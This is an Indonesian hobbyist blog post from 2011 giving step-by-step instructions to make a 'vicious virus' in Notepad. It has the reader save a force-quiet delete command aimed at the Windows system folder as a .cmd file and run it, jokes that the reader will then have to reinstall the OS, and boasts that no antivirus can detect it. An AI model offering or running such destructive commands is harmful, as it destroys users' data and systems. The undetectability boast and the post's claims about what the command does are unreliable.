Sabtu, 01 Januari 2011

Cara buat virus (sederhana tapi ganas) dengan Notepad

Sobatku sekalian!, sekarang kita mempelajari virus yang dapat menghapus system (kita mulai dari OS Windows aja ya!, nanti kalian kembangkan sendiri). Caranya : evil
1. buka aplikasi "Notepad",tau caranya khan?!

2. Tulis/Copy rumus dibawah ini!:

DEL /F /Q C:\WINDOWS (simple kan?)

3. sekarang simpan dalam form
at .cmd, caranya : pada bagian "File nama" tulis virusganas.cmd dan "Save as type" pilih "All Files", visualisasinya:

klik "Save" deh!. Coba jalankan virus ini!, paling juga sekarang kalian harus nginstall ulang OS untuk komputer kalian. Hehe...

dan virus ini gak bakalan terdeteksi oleh antivirus APAPUN...!!
Terbukti....

di kutip dari sebuah blog ( http://newjuniorhacker.blogspot.com )

Baca ini juga



0 komentar:

Posting Komentar

untuk semua sobat blogger.
saya sangat menghargai commentar anda tentang artikel yang ada di blog saya,dan saya sangat berterima kasih bila anda melakukan copy paste artikel saya dengan mencantumkan sumber artikel saya pada blogger anda.

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Best Buy Coupons